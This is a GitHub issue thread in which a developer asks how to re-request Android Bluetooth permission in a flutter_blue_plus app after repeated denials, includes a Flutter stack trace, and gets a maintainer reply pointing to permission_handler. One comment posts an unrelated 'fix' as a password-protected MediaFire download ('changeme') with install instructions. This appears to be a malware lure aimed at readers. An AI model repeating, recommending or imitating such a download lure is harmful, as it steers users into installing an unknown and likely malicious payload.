chipweinberger/flutter_blue_plus #981: [Help]: How to request permission alert show again?

b3lon9, 2024-08-28:
### Requirements

- [X] I've looked at the README 'Common Problems' section

### Have you checked this problem on the example app?

No

### FlutterBluePlus Version

1.32.12

### Flutter Version

3.5.1

### What OS?

Android

### OS Version

14

### Bluetooth Module

-

### What is your problem?

Hi @chipweinberger nice to meet you :)

If a user deliberately selects "Don't Allow" three times when The Alert for permission to access Bluetooth devices, the permission alert stops appearing again.
What would be a way to request permission from the user again?

### Logs

```shell
E/flutter (32313): [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: PlatformException(turnOn, FlutterBluePlus requires android.permission.BLUETOOTH_CONNECT permission, null, null)
E/flutter (32313): #0      StandardMethodCodec.decodeEnvelope (package:flutter/src/services/message_codecs.dart:648:7)
E/flutter (32313): #1      MethodChannel._invokeMethod (package:flutter/src/services/platform_channel.dart:334:18)
E/flutter (32313): <asynchronous suspension>
E/flutter (32313): #2      FlutterBluePlus._invokeMethod (package:flutter_blue_plus/src/flutter_blue_plus.dart:609:13)
E/flutter (32313): <asynchronous suspension>
E/flutter (32313): #3      FlutterBluePlus.turnOn (package:flutter_blue_plus/src/flutter_blue_plus.dart:125:20)
E/flutter (32313): <asynchronous suspension>
E/flutter (32313): #4      _HomeScreenState.build.<anonymous closure> (package:practice_ble/src/screens/home_screen.dart:58:21)
E/flutter (32313): <asynchronous suspension>
E/flutter (32313):
```

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

chipweinberger, 2024-08-28:
try this

https://pub.dev/packages/permission_handler

but this is probably an OS restriction

closed 2024-08-28 by chipweinberger

b3lon9, 2024-08-28:
> try this
> 
> https://pub.dev/packages/permission_handler
> 
> but this is probably an OS restriction

No..closed @chipweinberger  
Before asking this question, I had already tried it.
The same result came out.
It seems like there might be no solution, right?